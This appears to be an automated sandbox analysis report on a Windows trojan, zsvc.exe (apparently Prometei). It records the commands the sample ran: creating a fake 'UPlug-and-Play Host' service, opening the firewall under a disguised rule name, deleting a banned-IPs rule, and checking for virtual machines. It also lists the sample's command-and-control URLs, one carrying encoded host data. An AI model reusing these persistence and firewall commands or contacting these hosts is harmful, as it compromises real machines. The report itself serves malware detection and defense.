Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc'
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ren C:\windows\zsvc.exe sqhost.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc config UPlugPlay start= auto
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignore
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlay
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start UPlugPlay
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlay
Source: unknown	Process created: C:\Windows\sqhost.exe c:\windows\sqhost.exe Dcomsvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\sqhost.exe	Process created: C:\Windows\sqhost.exe c:\windows\sqhost.exe -watchdog
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start UPlugPlay
Source: C:\Windows\sqhost.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall delete rule name='Banned brute IPs'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\sqhost.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C Auditpol /set /subcategory:'Logon' /failure:enable
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall delete rule name='Banned brute IPs'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\auditpol.exe Auditpol /set /subcategory:'Logon' /failure:enable
Source: C:\Windows\sqhost.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic baseboard get product
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\sqhost.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic baseboard get product
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C copy /y 'c:\users\user\desktop\zsvc.exe' C:\windows	Jump to behavior
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc query UPlugPlay	Jump to behavior
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE	Jump to behavior
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C sc delete UPlugPlay&sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignore	Jump to behavior
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc'	Jump to behavior
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C sc config UPlugPlay start= auto	Jump to behavior
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ren C:\windows\zsvc.exe sqhost.exe	Jump to behavior
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlay	Jump to behavior
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlay	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query UPlugPlay	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete UPlugPlay	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignore	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc config UPlugPlay start= auto	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start UPlugPlay	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start UPlugPlay	Jump to behavior
Source: C:\Windows\sqhost.exe	Process created: C:\Windows\sqhost.exe c:\windows\sqhost.exe -watchdog	Jump to behavior
Source: C:\Windows\sqhost.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall delete rule name='Banned brute IPs'	Jump to behavior
Source: C:\Windows\sqhost.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C Auditpol /set /subcategory:'Logon' /failure:enable	Jump to behavior
Source: C:\Windows\sqhost.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic baseboard get product	Jump to behavior
Source: C:\Windows\sqhost.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic baseboard get product	Jump to behavior
Source: C:\Windows\sqhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\sqhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\sqhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\sqhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall delete rule name='Banned brute IPs'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\auditpol.exe Auditpol /set /subcategory:'Logon' /failure:enable	Jump to behavior

Source: C:\Users\user\Desktop\zsvc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: zsvc.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: C:\Users\user\Desktop\zsvc.exe

Code function: 1_2_000000014128D5A0 LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

1_2_000000014128D5A0

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior:

Creates files in the system32 config directory

Show sources

Source: C:\Windows\System32\netsh.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Local\PeerDistRepub

Jump to behavior

Source: C:\Windows\System32\cmd.exe

File created: C:\Windows\zsvc.exe

Jump to dropped file

Source: C:\Windows\System32\cmd.exe

File created: C:\Windows\zsvc.exe

Jump to dropped file

Source: C:\Windows\System32\reg.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UPlugPlay

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc query UPlugPlay

Source: C:\Users\user\Desktop\zsvc.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\zsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\sqhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Product FROM Win32_BaseBoard
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Product FROM Win32_BaseBoard

Source: C:\Windows\sqhost.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Windows\sqhost.exe

Window / User API: threadDelayed 1043

Jump to behavior

Source: C:\Windows\sqhost.exe TID: 6340	Thread sleep count: 107 > 30	Jump to behavior
Source: C:\Windows\sqhost.exe TID: 6340	Thread sleep count: 246 > 30	Jump to behavior
Source: C:\Windows\sqhost.exe TID: 6340	Thread sleep count: 56 > 30	Jump to behavior
Source: C:\Windows\sqhost.exe TID: 6340	Thread sleep time: -56000s >= -30000s	Jump to behavior
Source: C:\Windows\sqhost.exe TID: 6348	Thread sleep count: 1043 > 30	Jump to behavior
Source: C:\Windows\sqhost.exe TID: 6348	Thread sleep time: -52150000s >= -30000s	Jump to behavior
Source: C:\Windows\sqhost.exe TID: 6348	Thread sleep time: -50000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\sqhost.exe	Last function: Thread delayed
Source: C:\Windows\sqhost.exe	Last function: Thread delayed
Source: C:\Windows\sqhost.exe	Last function: Thread delayed
Source: C:\Windows\sqhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\sqhost.exe	Thread delayed: delay time: 50000			Jump to behavior
Source: C:\Windows\sqhost.exe	Thread delayed: delay time: 50000			Jump to behavior

Source: svchost.exe, 00000000.00000002.212282542.000001F0C3D40000.00000002.00000001.sdmp, sc.exe, 00000006.00000002.205549430.000001D09C630000.00000002.00000001.sdmp, sc.exe, 0000000F.00000002.210239450.00000220C08D0000.00000002.00000001.sdmp, reg.exe, 00000012.00000002.211563708.0000020EFC630000.00000002.00000001.sdmp, sc.exe, 00000014.00000002.211943954.0000021D7BC10000.00000002.00000001.sdmp, sc.exe, 0000001E.00000002.216955998.00000239EBB20000.00000002.00000001.sdmp, WMIC.exe, 00000025.00000002.240526052.000002BEE2060000.00000002.00000001.sdmp, WMIC.exe, 00000027.00000002.244835538.00000191189C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000000.00000002.212282542.000001F0C3D40000.00000002.00000001.sdmp, sc.exe, 00000006.00000002.205549430.000001D09C630000.00000002.00000001.sdmp, sc.exe, 0000000F.00000002.210239450.00000220C08D0000.00000002.00000001.sdmp, reg.exe, 00000012.00000002.211563708.0000020EFC630000.00000002.00000001.sdmp, sc.exe, 00000014.00000002.211943954.0000021D7BC10000.00000002.00000001.sdmp, sc.exe, 0000001E.00000002.216955998.00000239EBB20000.00000002.00000001.sdmp, WMIC.exe, 00000025.00000002.240526052.000002BEE2060000.00000002.00000001.sdmp, WMIC.exe, 00000027.00000002.244835538.00000191189C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000000.00000002.212282542.000001F0C3D40000.00000002.00000001.sdmp, sc.exe, 00000006.00000002.205549430.000001D09C630000.00000002.00000001.sdmp, sc.exe, 0000000F.00000002.210239450.00000220C08D0000.00000002.00000001.sdmp, reg.exe, 00000012.00000002.211563708.0000020EFC630000.00000002.00000001.sdmp, sc.exe, 00000014.00000002.211943954.0000021D7BC10000.00000002.00000001.sdmp, sc.exe, 0000001E.00000002.216955998.00000239EBB20000.00000002.00000001.sdmp, WMIC.exe, 00000025.00000002.240526052.000002BEE2060000.00000002.00000001.sdmp, WMIC.exe, 00000027.00000002.244835538.00000191189C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000000.00000002.212282542.000001F0C3D40000.00000002.00000001.sdmp, sc.exe, 00000006.00000002.205549430.000001D09C630000.00000002.00000001.sdmp, sc.exe, 0000000F.00000002.210239450.00000220C08D0000.00000002.00000001.sdmp, reg.exe, 00000012.00000002.211563708.0000020EFC630000.00000002.00000001.sdmp, sc.exe, 00000014.00000002.211943954.0000021D7BC10000.00000002.00000001.sdmp, sc.exe, 0000001E.00000002.216955998.00000239EBB20000.00000002.00000001.sdmp, WMIC.exe, 00000025.00000002.240526052.000002BEE2060000.00000002.00000001.sdmp, WMIC.exe, 00000027.00000002.244835538.00000191189C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllXX

Source: C:\Users\user\Desktop\zsvc.exe	API call chain: ExitProcess graph end node	graph_1-79
Source: C:\Windows\sqhost.exe	API call chain: ExitProcess graph end node	graph_27-79
Source: C:\Windows\sqhost.exe	API call chain: ExitProcess graph end node	graph_29-79

Source: C:\Users\user\Desktop\zsvc.exe

Code function: 1_2_000000014128D5A0 LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

1_2_000000014128D5A0

Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C copy /y 'c:\users\user\desktop\zsvc.exe' C:\windows	Jump to behavior
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc query UPlugPlay	Jump to behavior
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE	Jump to behavior
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C sc delete UPlugPlay&sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignore	Jump to behavior
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc'	Jump to behavior
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C sc config UPlugPlay start= auto	Jump to behavior
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ren C:\windows\zsvc.exe sqhost.exe	Jump to behavior
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlay	Jump to behavior
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlay	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query UPlugPlay	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete UPlugPlay	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignore	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc config UPlugPlay start= auto	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start UPlugPlay	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start UPlugPlay	Jump to behavior
Source: C:\Windows\sqhost.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall delete rule name='Banned brute IPs'	Jump to behavior
Source: C:\Windows\sqhost.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C Auditpol /set /subcategory:'Logon' /failure:enable	Jump to behavior
Source: C:\Windows\sqhost.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic baseboard get product	Jump to behavior
Source: C:\Windows\sqhost.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic baseboard get product	Jump to behavior
Source: C:\Windows\sqhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\sqhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\sqhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\sqhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall delete rule name='Banned brute IPs'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\auditpol.exe Auditpol /set /subcategory:'Logon' /failure:enable	Jump to behavior

Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE			Jump to behavior

Source: C:\Windows\sqhost.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\zsvc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Modifies the windows firewall

Show sources

Source: C:\Users\user\Desktop\zsvc.exe

Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Windows Service11	Windows Service11	Masquerading12	OS Credential Dumping	Query Registry1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter1	Boot or Logon Initialization Scripts	Process Injection11	Disable or Modify Tools2	LSASS Memory	Security Software Discovery111	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Service Execution1	Logon Script (Windows)	Logon Script (Windows)	Modify Registry1	Security Account Manager	Virtualization/Sandbox Evasion21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Native API1	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion21	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Proxy1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection11	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing1	DCSync	System Information Discovery122	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
zsvc.exe	70%	Virustotal		Browse
zsvc.exe	68%	ReversingLabs	Win64.Trojan.Phonzy
zsvc.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Windows\zsvc.exe	100%	Joe Sandbox ML
C:\Windows\zsvc.exe	68%	ReversingLabs	Win64.Trojan.Phonzy

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
p1.feefreepool.net	9%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://p1.feefreepool.net/cgi-bin/prometei.cgi?add=aW5mbyB7DQp2Mi43M0NfQU1ENjQNCjc2MDYzOQ0KDQo0eCBJb	0%	Avira URL Cloud	safe
https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi	0%	Avira URL Cloud	safe
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgifier	0%	Avira URL Cloud	safe
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgiW	0%	Avira URL Cloud	safe
http://p1.feefreepool.net/cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q5271	0%	Avira URL Cloud	safe
http://p1.feefreepool.net/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpj	0%	Avira URL Cloud	safe
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi	0%	Avira URL Cloud	safe
http://p1.feefreepool.net/cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q52710003	0%	Avira URL Cloud	safe
http://p1.feefreepool.net/cgi-bin/prometei.cgiexe	0%	Avira URL Cloud	safe
http://p1.feefreepool.net/cgi-bin/prometei.cgi?add=aW5mbyB7DQp2Mi43M0NfQU1ENjQNCjc2MDYzOQ0KDQo0eCBJbnRlbChSKSBDb3JlKFRNKTIgQ1BVIDY2MDAgQCAyLjQwIEdIeg0KDQoNClNGMURFUzlLQVMNCk5TT3V3IE9mDQoNCjEwLjAuMTcxMzQuMQ0KDQoNCjIwMjAwOTMwMDgwMjI5LjQ5MzE3Ny00MjANCk1pY3Jvc29mdCBXaW5kb3dzIDEwIFBybw0KfQ0K&h=computer&i=90Z405GXDA2Q5271&enckey=BtO0tzJv2apOB7qyzIW7zWStGW/UHBc4Xxf1Kg/hg-0ejQgNvvOI-nwRaXMjLhcvacc8U4MXZ7rGYP3FggtsNhWMcIqYeNGD/JknHi-IV66WOa6UuMMRKvZg2a3fLLQAOxVELNFmUML3ZKJUE7iUbF/IJ7fzTHFAPCETqP4WJyQ_	0%	Avira URL Cloud	safe
http://p1.feefreepool.net/cgi-bin/prometei.cgi	0%	Avira URL Cloud	safe
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgi	0%	Avira URL Cloud	safe
https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgipi.dllD	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

